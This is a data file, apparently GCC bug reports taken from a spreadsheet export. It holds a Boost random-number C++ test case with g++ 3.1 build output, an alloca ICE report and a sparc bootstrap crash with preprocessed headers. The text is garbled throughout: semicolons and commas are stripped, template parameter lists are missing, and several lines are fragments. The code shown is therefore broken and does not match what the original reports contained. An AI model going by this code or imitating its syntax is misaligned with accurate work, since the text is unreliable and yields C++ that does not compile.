        static const bool is_specialized = true
        static int max() throw()
        { return 2147483647 }
    }
} // namespace std
# define BOOST_STATIC_CONSTANT(type assignment) static const type assignment
namespace boost
{
    typedef int int32_t
namespace random {
// compile-time configurable linear congruential generator
template
class linear_congruential
{
public:
  typedef IntType result_type
  static const bool has_fixed_range = true
  result_type min() const { return c == 0 ? 1 : 0 }
  result_type max() const { return m-1 }
  explicit linear_congruential(IntType x0 = 1)
    : _x(x0)
  { 
  }
  IntType operator()()
  {
    return _x
  }
private:
  IntType _x
}
} // namespace random
// validation values from the publications
typedef random::linear_congruential&lt;int32_t 16807 0 2147483647 
  1043618065&gt; minstd_rand0
// must be in boost namespace otherwise the inline friend trick fails
template
class generator_iterator_mixin_adapter
{
public:
  typedef ResultType value_type
  Generator return cast() }
  const value_type }
protected:
  // instantiate from derived classes only
  generator_iterator_mixin_adapter() { }
  void iterator_init() { operator++() }
private:
  Generator  }
  value_type v
}
// uniform integer distribution on a small range [min max]
template
class uniform_smallint
  : public generator_iterator_mixin_adapter&lt;
        uniform_smallint IntType &gt;
{
public:
  typedef UniformRandomNumberGenerator base_type
  typedef IntType result_type
  BOOST_STATIC_CONSTANT(bool has_fixed_range = false)
  uniform_smallint(base_type 
  result_type operator()()
  {
    // we must not use the low bits here because LCGs get very bad then
    return ((_rng() - _rng.min()) / _factor) % _range + _min
  }
  result_type min() const { return _min }
  result_type max() const { return _max }
  friend bool operator==(const uniform_smallint&amp; x const uniform_smallint&amp; y)
  { return x._min == y._min  }
private:
  typedef typename base_type::result_type base_result
  base_type 
  IntType _min _max
  base_result _range
  int _factor
}
template
uniform_smallint::
uniform_smallint(base_type &amp; rng IntType min IntType max) 
  : _rng(rng) _min(min) _max(max)
    _range(static_cast(_max-_min)+1) _factor(1)
{
    printf(Constructor called\n)
  assert(min &lt; max)
  // check how many low bits we can ignore before we get too much
  // quantization error
  base_result r_base = _rng.max() - _rng.min()
  if(r_base == std::numeric_limits::max()) {
    _factor = 2
    r_base /= 2
  }
  r_base += 1
  if(r_base % _range == 0) {
    // no quantization effects good
    _factor = r_base / _range
  } else {
    const base_result r = 32*_range*_range
    for( r_base &gt;= r _factor *= 2)
      r_base /= 2
  }
  this-&gt;iterator_init()  // initialize iterator interface
}
// uniform integer distribution on [min max]
template
class uniform_int
  : public generator_iterator_mixin_adapter&lt;
        uniform_int IntType &gt;
{
public:
  typedef UniformRandomNumberGenerator base_type
  typedef IntType result_type
  BOOST_STATIC_CONSTANT(bool has_fixed_range = false)
  uniform_int(base_type &amp; rng IntType min IntType max) 
    : _rng(rng) _min(min) _max(max) _range(_max - _min)
      _bmin(_rng.min()) _brange(_rng.max() - _bmin)
  {
    assert(min &lt; max) 
    this-&gt;iterator_init()
  }
  result_type operator()()
  result_type min() const { return _min }
  result_type max() const { return _max }
  friend bool operator==(const uniform_int&amp; x const uniform_int&amp; y)
  { return x._min == y._min  }
private:
  typedef typename base_type::result_type base_result
  base_type 
  result_type _min _max _range
  base_result _bmin _brange
}
template
inline IntType uniform_int::operator()()
{
}
} // namespace boost
template
void instantiate_urng(const URNG &amp; const ResultType &amp;)
{
  URNG urng
  int a[URNG::has_fixed_range ? 5 : 10]        // compile-time constant
  (void) a   // avoid unused warning
  typename URNG::result_type x1 = urng()
  boost::uniform_smallint unismall(urng 0 11)
}
void instantiate_all()
{
  using namespace boost
  instantiate_urng(minstd_rand0() 0)
}
int main()
{
  instantiate_all()
}
Compiling the program t
g++ -v -o t t.C -W -Wall -save-temps
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/specs
Configured with: ../gcc/configure --enable-shared --disable-nls --enable-threads=posix --enable-long-long --enable-languages=cc++f77objc
Thread model: posix
gcc version 3.1 20010428 (experimental)
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/cpp0 -lang-c++ -D_GNU_SOURCE -D__GNUG__=3 -D__DEPRECATED -D__EXCEPTIONS -D__GXX_ABI_VERSION=100 -v -D__GNUC__=3 -D__GNUC_MINOR__=1 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__STDC_HOSTED__=1 -W -Wall -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i686__ -D__tune_pentiumpro__ t.C t.ii
GNU CPP version 3.1 20010428 (experimental) (cpplib) (i386 Linux/ELF)
#include ... search starts here:
#include  search starts here:
 /usr/local/include/g++-v3
 /usr/local/include/g++-v3/i686-pc-linux-gnu
 /usr/local/include/g++-v3/backward
 /usr/local/include
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/include
 /usr/local/i686-pc-linux-gnu/include
 /usr/include
End of search list.
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/cc1plus -fpreprocessed t.ii -quiet -dumpbase t.C -W -Wall -version -o t.s
GNU CPP version 3.1 20010428 (experimental) (cpplib) (i386 Linux/ELF)
GNU C++ version 3.1 20010428 (experimental) (i686-pc-linux-gnu)
	compiled by GNU C version 3.1 20010428 (experimental).
t.C: In function `void instantiate_urng(const URNG&amp; const ResultType&amp;) [with 
   URNG = boost::minstd_rand0 ResultType = int]':
t.C:184:   instantiated from here
t.C:176: warning: unused variable `int32_t x1'
t.C:178: warning: unused variable `boost::uniform_smallint&lt;boost::minstd_rand0 
   int&gt; unismall'
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/../../../../i686-pc-linux-gnu/bin/as -V -Qy -o t.o t.s
GNU assembler version 2.11.90.0.4 (i686-pc-linux-gnu) using BFD version 2.11.90.0.4
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/collect2 -m elf_i386 -dynamic-linker /lib/ld-linux.so.2 -o t /usr/lib/crt1.o /usr/lib/crti.o /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/crtbegin.o -L/usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1 -L/usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/../../../../i686-pc-linux-gnu/lib -L/usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/../../.. t.o -lstdc++ -lm -lgcc_s -lc -lgcc_s /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/crtend.o /usr/lib/crtn.o
Running the program t (compiled by g++ 3.1)
./t
Constructor called
Constructor called
Floating point exception (core dumped)
Running the program t (compiled by g++ 2.95.2)
./t
Constructor called
Preprocessed source file t.ii
# 1 t.C
# 1 /usr/include/assert.h 1 3
# 35 /usr/include/assert.h 3
# 1 /usr/include/features.h 1 3
# 283 /usr/include/features.h 3
# 1 /usr/include/sys/cdefs.h 1 3
# 284 /usr/include/features.h 2 3
# 311 /usr/include/features.h 3
# 1 /usr/include/gnu/stubs.h 1 3
# 312 /usr/include/features.h 2 3
# 36 /usr/include/assert.h 2 3
# 58 /usr/include/assert.h 3
extern C {
extern void __assert_fail (__const char *__assertion __const char *__file
                           unsigned int __line __const char *__function)
     throw () __attribute__ ((__noreturn__))
extern void __assert_perror_fail (int __errnum __const char *__file
                                  unsigned int __line
                                  __const char *__function)
     throw () __attribute__ ((__noreturn__))
extern void __assert (const char *__assertion const char *__file int __line)
     throw () __attribute__ ((__noreturn__))
}
# 2 t.C 2
extern C int printf (const char * ...)
namespace std {
    template struct numeric_limits {
        static const bool is_specialized = false
        static _Tp max() throw() { return static_cast(0) }
    }
    template struct numeric_limits {
        static const bool is_specialized = true
        static int max() throw()
        { return 2147483647 }
    }
}
namespace boost
{
    typedef int int32_t
namespace random {
template
class linear_congruential
{
public:
  typedef IntType result_type
  static const bool has_fixed_range = true
  result_type min() const { return c == 0 ? 1 : 0 }
  result_type max() const { return m-1 }
  explicit linear_congruential(IntType x0 = 1)
    : _x(x0)
  {
  }
  IntType operator()()
  {
    return _x
  }
private:
  IntType _x
}
}
typedef random::linear_congruential&lt;int32_t 16807 0 2147483647
  1043618065&gt; minstd_rand0
template
class generator_iterator_mixin_adapter
{
public:
  typedef ResultType value_type
  Generator return cast() }
  const value_type }
protected:
  generator_iterator_mixin_adapter() { }
  void iterator_init() { operator++() }
private:
  Generator  }
  value_type v
}
template
class uniform_smallint
  : public generator_iterator_mixin_adapter&lt;
        uniform_smallint IntType &gt;
{
public:
  typedef UniformRandomNumberGenerator base_type
  typedef IntType result_type
  static const bool has_fixed_range = false
  uniform_smallint(base_type 
  result_type operator()()
  {
    return ((_rng() - _rng.min()) / _factor) % _range + _min
  }
  result_type min() const { return _min }
  result_type max() const { return _max }
  friend bool operator==(const uniform_smallint&amp; x const uniform_smallint&amp; y)
  { return x._min == y._min  }
private:
  typedef typename base_type::result_type base_result
  base_type 
  IntType _min _max
  base_result _range
  int _factor
}
template
uniform_smallint::
uniform_smallint(base_type &amp; rng IntType min IntType max)
  : _rng(rng) _min(min) _max(max)
    _range(static_cast(_max-_min)+1) _factor(1)
{
    printf(Constructor called\n)
  ((void) ((min &lt; max) ? 0 : (__assert_fail (min &lt; max t.C 109 __PRETTY_FUNCTION__) 0)))
  base_result r_base = _rng.max() - _rng.min()
  if(r_base == std::numeric_limits::max()) {
    _factor = 2
    r_base /= 2
  }
  r_base += 1
  if(r_base % _range == 0) {
    _factor = r_base / _range
  } else {
    const base_result r = 32*_range*_range
    for( r_base &gt;= r _factor *= 2)
      r_base /= 2
  }
  this-&gt;iterator_init()
}
template
class uniform_int
  : public generator_iterator_mixin_adapter&lt;
        uniform_int IntType &gt;
{
public:
  typedef UniformRandomNumberGenerator base_type
  typedef IntType result_type
  static const bool has_fixed_range = false
  uniform_int(base_type &amp; rng IntType min IntType max)
    : _rng(rng) _min(min) _max(max) _range(_max - _min)
      _bmin(_rng.min()) _brange(_rng.max() - _bmin)
  {
    ((void) ((min &lt; max) ? 0 : (__assert_fail (min &lt; max t.C 145 __PRETTY_FUNCTION__) 0)))
    this-&gt;iterator_init()
  }
  result_type operator()()
  result_type min() const { return _min }
  result_type max() const { return _max }
  friend bool operator==(const uniform_int&amp; x const uniform_int&amp; y)
  { return x._min == y._min  }
private:
  typedef typename base_type::result_type base_result
  base_type 
  result_type _min _max _range
  base_result _bmin _brange
}
template
inline IntType uniform_int::operator()()
{
}
}
template
void instantiate_urng(const URNG &amp; const ResultType &amp;)
{
  URNG urng
  int a[URNG::has_fixed_range ? 5 : 10]
  (void) a
  typename URNG::result_type x1 = urng()
  boost::uniform_smallint unismall(urng 0 11)
}
void instantiate_all()
{
  using namespace boost
  instantiate_urng(minstd_rand0() 0)
}
int main()
{
  instantiate_all()
}</t>
  </si>
  <si>
    <t>GCC-51354</t>
  </si>
  <si>
    <t>[4.7 Regression] ICE in maybe_record_trace_start</t>
  </si>
  <si>
    <t>extern void abort (void)
typedef int __attribute__((aligned (32))) ai
void foo (int *x ai *y)
int
bar (int x)
{
  if (x == 12346)
    return 24
  ai i
  foo (__builtin_alloca (x) 
  return 128
}
ICEs in maybe_record_trace_start at dwarf2cfi.c:2244
at -O2 on x86_64-linux.</t>
  </si>
  <si>
    <t>GCC-6460</t>
  </si>
  <si>
    <t>ICE building gcc 2002-04-25 trunk on sparc32-linux: crtstuff.c?</t>
  </si>
  <si>
    <t xml:space="preserve">
Release:
3.2 cvs trunk 2002-04-25
Environment:
System: Linux fw 2.2.20 #1 SMP Fri Nov 16 16:15:32 EST 2001 sparc unknown
Architecture: sparc
host: sparc-unknown-linux-gnu
build: sparc-unknown-linux-gnu
target: sparc-unknown-linux-gnu
Configured with: /share1/gcc-dev/gcc/configure sparc-linux --prefix=/usr --enable-shared --with-gnu-as --with-gnu-ld --with-system-zlib --enable-long-long --enable-languages=cc++f77javaobjc --enable-nls --enable-symvers --without-x --without-included-gettext --disable-checking
Thread model: single
gcc version 3.2 20020425 (experimental)
How-To-Repeat:
While boostrapping on my SS20 sun4m SMP linux32-sparc system I get an
ICE:
./xgcc -B./ -B/usr/sparc-linux/bin/ -isystem /usr/sparc-linux/include -isystem /usr/sparc-linux/sys-include -O2 -DIN_GCC    -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -isystem ./include  -I. -I. -I/share1/gcc-dev/gcc/gcc -I/share1/gcc-dev/gcc/gcc/. -I/share1/gcc-dev/gcc/gcc/config -I/share1/gcc-dev/gcc/gcc/../include  -g0 -finhibit-size-directive -fno-inline-functions -fno-exceptions -fno-zero-initialized-in-bss -fPIC \
   -c /share1/gcc-dev/gcc/gcc/crtstuff.c -DCRT_BEGIN -DCRTSTUFFS_O \
  -o crtbeginS.o
In file included from /share1/gcc-dev/gcc/gcc/tsystem.h:81
                 from /share1/gcc-dev/gcc/gcc/crtstuff.c:62:
/usr/include/stdlib.h: In function `atof':
/usr/include/stdlib.h:358: internal error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[2]: *** [crtbegin.o] Error 1
make[2]: *** Waiting for unfinished jobs....
In file included from /share1/gcc-dev/gcc/gcc/tsystem.h:81
                 from /share1/gcc-dev/gcc/gcc/crtstuff.c:62:
/usr/include/stdlib.h: In function `atof':
/usr/include/stdlib.h:358: internal error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[2]: *** [crtbeginS.o] Error 1
make[2]: Leaving directory `/share1/gcc-dev/objdir/gcc'
make[1]: *** [stage1_build] Error 2
make[1]: Leaving directory `/share1/gcc-dev/objdir/gcc'
make: *** [bootstrap-lean] Error 2
Here's the -save-temps output crtstuff.i:
# 1 /share1/gcc-dev/gcc/gcc/crtstuff.c
# 1 
# 1 
# 1 /share1/gcc-dev/gcc/gcc/crtstuff.c
# 60 /share1/gcc-dev/gcc/gcc/crtstuff.c
# 1 auto-host.h 1
# 61 /share1/gcc-dev/gcc/gcc/crtstuff.c 2
# 1 tconfig.h 1
struct rtx_def
typedef struct rtx_def *rtx
struct rtvec_def
typedef struct rtvec_def *rtvec
union tree_node
typedef union tree_node *tree
# 1 /share1/gcc-dev/gcc/include/ansidecl.h 1
# 15 tconfig.h 2
# 1 /share1/gcc-dev/gcc/gcc/config/sparc/sparc.h 1
# 82 /share1/gcc-dev/gcc/gcc/config/sparc/sparc.h
enum cmodel {
  CM_32
  CM_MEDLOW
  CM_MEDMID
  CM_MEDANY
  CM_EMBMEDANY
}
extern const char *sparc_cmodel_string
extern enum cmodel sparc_cmodel
# 389 /share1/gcc-dev/gcc/gcc/config/sparc/sparc.h
extern int target_flags
# 613 /share1/gcc-dev/gcc/gcc/config/sparc/sparc.h
enum processor_type {
  PROCESSOR_V7
  PROCESSOR_CYPRESS
  PROCESSOR_V8
  PROCESSOR_SUPERSPARC
  PROCESSOR_SPARCLITE
  PROCESSOR_F930
  PROCESSOR_F934
  PROCESSOR_HYPERSPARC
  PROCESSOR_SPARCLITE86X
  PROCESSOR_SPARCLET
  PROCESSOR_TSC701
  PROCESSOR_V9
  PROCESSOR_ULTRASPARC
}
extern enum processor_type sparc_cpu
# 651 /share1/gcc-dev/gcc/gcc/config/sparc/sparc.h
struct sparc_cpu_select
{
  const char *string
  const char *const name
  const int set_tune_p
  const int set_arch_p
}
extern struct sparc_cpu_select sparc_select[]
# 1043 /share1/gcc-dev/gcc/gcc/config/sparc/sparc.h
extern const int *hard_regno_mode_classes
extern int sparc_mode_class[]
# 1224 /share1/gcc-dev/gcc/gcc/config/sparc/sparc.h
enum reg_class { NO_REGS FPCC_REGS I64_REGS GENERAL_REGS FP_REGS
                 EXTRA_FP_REGS GENERAL_OR_FP_REGS GENERAL_OR_EXTRA_FP_REGS
                 ALL_REGS LIM_REG_CLASSES }
# 1257 /share1/gcc-dev/gcc/gcc/config/sparc/sparc.h
extern enum reg_class sparc_regno_reg_class[102]
# 1307 /share1/gcc-dev/gcc/gcc/config/sparc/sparc.h
extern char sparc_leaf_regs[]
extern const char leaf_reg_remap[]
# 1694 /share1/gcc-dev/gcc/gcc/config/sparc/sparc.h
struct sparc_args {
  int words
  int prototype_p
  int libcall_p
}
# 1783 /share1/gcc-dev/gcc/gcc/config/sparc/sparc.h
extern struct rtx_def *sparc_compare_op0 *sparc_compare_op1
# 1811 /share1/gcc-dev/gcc/gcc/config/sparc/sparc.h
extern char sparc_hard_reg_printed[8]
# 16 tconfig.h 2
# 1 /share1/gcc-dev/gcc/gcc/config/dbxelf.h 1
# 17 tconfig.h 2
# 1 /share1/gcc-dev/gcc/gcc/config/elfos.h 1
# 18 tconfig.h 2
# 1 /share1/gcc-dev/gcc/gcc/config/svr4.h 1
# 19 tconfig.h 2
# 1 /share1/gcc-dev/gcc/gcc/config/sparc/sysv4.h 1
# 20 tconfig.h 2
# 1 /share1/gcc-dev/gcc/gcc/config/sparc/linux.h 1
# 21 tconfig.h 2
# 1 /share1/gcc-dev/gcc/gcc/defaults.h 1
# 22 tconfig.h 2
# 62 /share1/gcc-dev/gcc/gcc/crtstuff.c 2
# 1 /share1/gcc-dev/gcc/gcc/tsystem.h 1
# 37 /share1/gcc-dev/gcc/gcc/tsystem.h
# 1 include/stddef.h 1 3
# 147 include/stddef.h 3
typedef int ptrdiff_t
# 201 include/stddef.h 3
typedef unsigned int size_t
# 294 include/stddef.h 3
typedef int wchar_t
# 38 /share1/gcc-dev/gcc/gcc/tsystem.h 2
# 1 include/float.h 1 3
# 39 /share1/gcc-dev/gcc/gcc/tsystem.h 2
# 61 /share1/gcc-dev/gcc/gcc/tsystem.h
# 1 include/stdarg.h 1 3
# 43 include/stdarg.h 3
typedef __builtin_va_list __gnuc_va_list
# 110 include/stdarg.h 3
typedef __gnuc_va_list va_list
# 62 /share1/gcc-dev/gcc/gcc/tsystem.h 2
# 1 include/stdio.h 1 3
# 37 include/stdio.h 3
# 1 /usr/include/features.h 1 3
# 283 /usr/include/features.h 3
# 1 /usr/include/sys/cdefs.h 1 3
# 284 /usr/include/features.h 2 3
# 312 /usr/include/features.h 3
# 1 /usr/include/gnu/stubs.h 1 3
# 313 /usr/include/features.h 2 3
# 38 include/stdio.h 2 3
# 1 include/stddef.h 1 3
# 44 include/stdio.h 2 3
# 1 /usr/include/bits/types.h 1 3
# 29 /usr/include/bits/types.h 3
# 1 include/stddef.h 1 3
# 30 /usr/include/bits/types.h 2 3
# 1 /usr/include/bits/wordsize.h 1 3
# 31 /usr/include/bits/types.h 2 3
typedef unsigned char __u_char
typedef unsigned short int __u_short
typedef unsigned int __u_int
typedef unsigned long int __u_long
__extension__ typedef unsigned long long int __u_quad_t
__extension__ typedef long long int __quad_t
# 55 /usr/include/bits/types.h 3
typedef signed char __int8_t
typedef unsigned char __uint8_t
typedef signed short int __int16_t
typedef unsigned short int __uint16_t
typedef signed int __int32_t
typedef unsigned int __uint32_t
__extension__ typedef signed long long int __int64_t
__extension__ typedef unsigned long long int __uint64_t
typedef __quad_t *__qaddr_t
typedef __u_quad_t __dev_t
typedef __u_int __uid_t
typedef __u_int __gid_t
typedef __u_long __ino_t
typedef __u_quad_t __ino64_t
typedef __u_int __mode_t
typedef __u_int __nlink_t
typedef long int __off_t
typedef __quad_t __off64_t
typedef __quad_t __loff_t
typedef int __pid_t
typedef int __ssize_t
typedef __u_long __rlim_t
typedef __u_quad_t __rlim64_t
typedef __u_int __id_t
typedef struct
  {
    int __val[2]
  } __fsid_t
typedef int __daddr_t
typedef char *__caddr_t
typedef long int __time_t
typedef unsigned int __useconds_t
typedef int __suseconds_t
typedef long int __swblk_t
typedef long int __clock_t
typedef int __clockid_t
typedef int __timer_t
typedef int __key_t
typedef unsigned short int __ipc_pid_t
typedef long int __blksize_t
typedef long int __blkcnt_t
typedef __quad_t __blkcnt64_t
typedef __u_long __fsblkcnt_t
typedef __u_quad_t __fsblkcnt64_t
typedef unsigned long int __fsfilcnt_t
typedef __u_quad_t __fsfilcnt64_t
typedef long int __t_scalar_t
typedef unsigned long int __t_uscalar_t
typedef int __intptr_t
typedef unsigned int __socklen_t
# 1 /usr/include/bits/pthreadtypes.h 1 3
# 23 /usr/include/bits/pthreadtypes.h 3
# 1 /usr/include/bits/sched.h 1 3
# 68 /usr/include/bits/sched.h 3
struct __sched_param
  {
    int __sched_priority
  }
# 24 /usr/include/bits/pthreadtypes.h 2 3
typedef int __atomic_lock_t
struct _pthread_fastlock
{
  long int __status
  __atomic_lock_t __spinlock
}
typedef struct _pthread_descr_struct *_pthread_descr
typedef struct __pthread_attr_s
{
  int __detachstate
  int __schedpolicy
  struct __sched_param __schedparam
  int __inheritsched
  int __scope
  size_t __guardsize
  int __stackaddr_set
  void *__stackaddr
  size_t __stacksize
} pthread_attr_t
typedef struct
{
  struct _pthread_fastlock __c_lock
  _pthread_descr __c_waiting
} pthread_cond_t
typedef struct
{
  int __dummy
} pthread_condattr_t
typedef unsigned int pthread_key_t
typedef struct
{
  int __m_reserved
  int __m_count
  _pthread_descr __m_owner
  int __m_kind
  struct _pthread_fastlock __m_lock
} pthread_mutex_t
typedef struct
{
  int __mutexkind
} pthread_mutexattr_t
typedef int pthread_once_t
typedef struct _pthread_rwlock_t
{
  struct _pthread_fastlock __rw_lock
  int __rw_readers
  _pthread_descr __rw_writer
  _pthread_descr __rw_read_waiting
  _pthread_descr __rw_write_waiting
  int __rw_kind
  int __rw_pshared
} pthread_rwlock_t
typedef struct
{
  int __lockkind
  int __pshared
} pthread_rwlockattr_t
typedef volatile int pthread_spinlock_t
typedef struct {
  struct _pthread_fastlock __ba_lock
  int __ba_required
  int __ba_present
  _pthread_descr __ba_waiting
} pthread_barrier_t
typedef struct {
  int __pshared
} pthread_barrierattr_t
typedef unsigned long int pthread_t
# 162 /usr/include/bits/types.h 2 3
# 46 include/stdio.h 2 3
# 54 include/stdio.h 3
typedef struct _IO_FILE FILE
# 64 include/stdio.h 3
typedef struct _IO_FILE __FILE
# 74 include/stdio.h 3
# 1 /usr/include/libio.h 1 3
# 32 /usr/include/libio.h 3
# 1 /usr/include/_G_config.h 1 3
# 14 /usr/include/_G_config.h 3
# 1 include/stddef.h 1 3
# 321 include/stddef.h 3
typedef unsigned int wint_t
# 15 /usr/include/_G_config.h 2 3
# 24 /usr/include/_G_config.h 3
# 1 /usr/include/wchar.h 1 3
# 48 /usr/include/wchar.h 3
# 1 include/stddef.h 1 3
# 49 /usr/include/wchar.h 2 3
# 1 /usr/include/bits/wchar.h 1 3
# 51 /usr/include/wchar.h 2 3
# 67 /usr/include/wchar.h 3
typedef struct
{
  int __count
  union
  {
    wint_t __wch
    char __wchb[4]
  } __value
} __mbstate_t
# 25 /usr/include/_G_config.h 2 3
typedef struct
{
  __off_t __pos
  __mbstate_t __state
} _G_fpos_t
typedef struct
{
  __off64_t __pos
  __mbstate_t __state
} _G_fpos64_t
# 44 /usr/include/_G_config.h 3
# 1 /usr/include/gconv.h 1 3
# 28 /usr/include/gconv.h 3
# 1 /usr/include/wchar.h 1 3
# 48 /usr/include/wchar.h 3
# 1 include/stddef.h 1 3
# 49 /usr/include/wchar.h 2 3
# 29 /usr/include/gconv.h 2 3
# 1 include/stddef.h 1 3
# 32 /usr/include/gconv.h 2 3
enum
{
  __GCONV_OK = 0
  __GCONV_NOCONV
  __GCONV_NODB
  __GCONV_NOMEM
  __GCONV_EMPTY_INPUT
  __GCONV_FULL_OUTPUT
  __GCONV_ILLEGAL_INPUT
  __GCONV_INCOMPLETE_INPUT
  __GCONV_ILLEGAL_DESCRIPTOR
  __GCONV_INTERNAL_ERROR
}
enum
{
  __GCONV_IS_LAST = 0x0001
  __GCONV_IGNORE_ERRORS = 0x0002
}
struct __gconv_step
struct __gconv_step_data
struct __gconv_loaded_object
struct __gconv_trans_data
typedef int (*__gconv_fct) (struct __gconv_step * struct __gconv_step_data *
                            __const unsigned char ** __const unsigned char *
                            unsigned char ** size_t * int int)
typedef int (*__gconv_init_fct) (struct __gconv_step *)
typedef void (*__gconv_end_fct) (struct __gconv_step *)
typedef int (*__gconv_trans_fct) (struct __gconv_step *
                                  struct __gconv_step_data * void *
                                  __const unsigned char *
                                  __const unsigned char **
                                  __const unsigned char * unsigned char **
                                  size_t *)
typedef int (*__gconv_trans_context_fct) (void * __const unsigned char *
                                          __const unsigned char *
                                          unsigned char * unsigned char *)
typedef int (*__gconv_trans_query_fct) (__const char * __const char ***
                                        size_t *)
typedef int (*__gconv_trans_init_fct) (void ** const char *)
typedef void (*__gconv_trans_end_fct) (void *)
struct __gconv_trans_data
{
  __gconv_trans_fct __trans_fct
  __gconv_trans_context_fct __trans_context_fct
  __gconv_trans_end_fct __trans_end_fct
  void *__data
  struct __gconv_trans_data *__next
}
struct __gconv_step
{
  struct __gconv_loaded_object *__shlib_handle
  __const char *__modname
  int __counter
  char *__from_name
  char *__to_name
  __gconv_fct __fct
  __gconv_init_fct __init_fct
  __gconv_end_fct __end_fct
  int __min_needed_from
  int __max_needed_from
  int __min_needed_to
  int __max_needed_to
  int __stateful
  void *__data
}
struct __gconv_step_data
{
  unsigned char *__outbuf
  unsigned char *__outbufend
  int __flags
  int __invocation_counter
  int __internal_use
  __mbstate_t *__statep
  __mbstate_t __state
  struct __gconv_trans_data *__trans
}
typedef struct __gconv_info
{
  size_t __nsteps
  struct __gconv_step *__steps
  __extension__ struct __gconv_step_data __data []
} *__gconv_t
# 45 /usr/include/_G_config.h 2 3
typedef union
{
  struct __gconv_info __cd
  struct
  {
    struct __gconv_info __cd
    struct __gconv_step_data __data
  } __combined
} _G_iconv_t
typedef int _G_int16_t __attribute__ ((__mode__ (__HI__)))
typedef int _G_int32_t __attribute__ ((__mode__ (__SI__)))
typedef unsigned int _G_uint16_t __attribute__ ((__mode__ (__HI__)))
typedef unsigned int _G_uint32_t __attribute__ ((__mode__ (__SI__)))
# 33 /usr/include/libio.h 2 3
# 160 /usr/include/libio.h 3
struct _IO_jump_t struct _IO_FILE
# 170 /usr/include/libio.h 3
typedef void _IO_lock_t
struct _IO_marker {
  struct _IO_marker *_next
  struct _IO_FILE *_sbuf
  int _pos
# 193 /usr/include/libio.h 3
}
enum __codecvt_result
{
  __codecvt_ok
  __codecvt_partial
  __codecvt_error
  __codecvt_noconv
}
# 261 /usr/include/libio.h 3
struct _IO_FILE {
  int _flags
  char* _IO_read_ptr
  char* _IO_read_end
  char* _IO_read_base
  char* _IO_write_base
  char* _IO_write_ptr
  char* _IO_write_end
  char* _IO_buf_base
  char* _IO_buf_end
  char *_IO_save_base
  char *_IO_backup_base
  char *_IO_save_end
  struct _IO_marker *_markers
  struct _IO_FILE *_chain
  int _fileno
  int _blksize
  __off_t _old_offset
  unsigned short _cur_column
  signed char _vtable_offset
  char _shortbuf[1]
  _IO_lock_t *_lock
# 305 /usr/include/libio.h 3
  __off64_t _offset
  void *__pad1
  void *__pad2
  int _mode
  char _unused2[15 * sizeof (int) - 2 * sizeof (void *)]
}
typedef struct _IO_FILE _IO_FILE
struct _IO_FILE_plus
extern struct _IO_FILE_plus _IO_2_1_stdin_
extern struct _IO_FILE_plus _IO_2_1_stdout_
extern struct _IO_FILE_plus _IO_2_1_stderr_
# 344 /usr/include/libio.h 3
typedef __ssize_t __io_read_fn (void *__cookie char *__buf size_t __nbytes)
typedef __ssize_t __io_write_fn (void *__cookie __const char *__buf
                                 size_t __n)
typedef int __io_seek_fn (void *__cookie __off64_t *__pos int __w)
typedef int __io_close_fn (void *__cookie)
typedef __io_read_fn cookie_read_function_t
typedef __io_write_fn cookie_write_function_t
typedef __io_seek_fn cookie_seek_function_t
typedef __io_close_fn cookie_close_function_t
typedef struct
{
  __io_read_fn *read
  __io_write_fn *write
  __io_seek_fn *seek
  __io_close_fn *close
} _IO_cookie_io_functions_t
typedef _IO_cookie_io_functions_t cookie_io_functions_t
struct _IO_cookie_file
extern void _IO_cookie_init (struct _IO_cookie_file *__cfile int __read_write
                             void *__cookie _IO_cookie_io_functions_t __fns)
extern int __underflow (_IO_FILE *) 
extern int __uflow (_IO_FILE *) 
extern int __overflow (_IO_FILE * int) 
extern wint_t __wunderflow (_IO_FILE *) 
extern wint_t __wuflow (_IO_FILE *) 
extern wint_t __woverflow (_IO_FILE * wint_t) 
# 426 /usr/include/libio.h 3
extern int _IO_getc (_IO_FILE *__fp) 
extern int _IO_putc (int __c _IO_FILE *__fp) 
extern int _IO_feof (_IO_FILE *__fp) 
extern int _IO_ferror (_IO_FILE *__fp) 
extern int _IO_peekc_locked (_IO_FILE *__fp) 
extern void _IO_flockfile (_IO_FILE *) 
extern void _IO_funlockfile (_IO_FILE *) 
extern int _IO_ftrylockfile (_IO_FILE *) 
# 456 /usr/include/libio.h 3
extern int _IO_vfscanf (_IO_FILE * __restrict const char * __restrict
                        __gnuc_va_list int *__restrict) 
extern int _IO_vfprintf (_IO_FILE *__restrict const char *__restrict
                         __gnuc_va_list) 
extern __ssize_t _IO_padn (_IO_FILE * int __ssize_t) 
extern size_t _IO_sgetn (_IO_FILE * void * size_t) 
extern __off64_t _IO_seekoff (_IO_FILE * __off64_t int int) 
extern __off64_t _IO_seekpos (_IO_FILE * __off64_t int) 
extern void _IO_free_backup_area (_IO_FILE *) 
# 75 include/stdio.h 2 3
typedef __gnuc_va_list __not_va_list__
# 89 include/stdio.h 3
typedef _G_fpos_t fpos_t
typedef _G_fpos64_t fpos64_t
# 138 include/stdio.h 3
# 1 /usr/include/bits/stdio_lim.h 1 3
# 139 include/stdio.h 2 3
extern FILE *stdin
extern FILE *stdout
extern FILE *stderr
extern int remove (__const char *__filename) 
extern int rename (__const char *__old __const char *__new) 
extern FILE *tmpfile (void) 
# 167 include/stdio.h 3
extern FILE *tmpfile64 (void) 
extern char *tmpnam (char *__s) 
extern char *tmpnam_r (char *__s) 
# 187 include/stdio.h 3
extern char *tempnam (__const char *__dir __const char *__pfx)
     __attribute__ ((__malloc__))
extern int fclose (FILE *__stream) 
extern int fflush (FILE *__stream) 
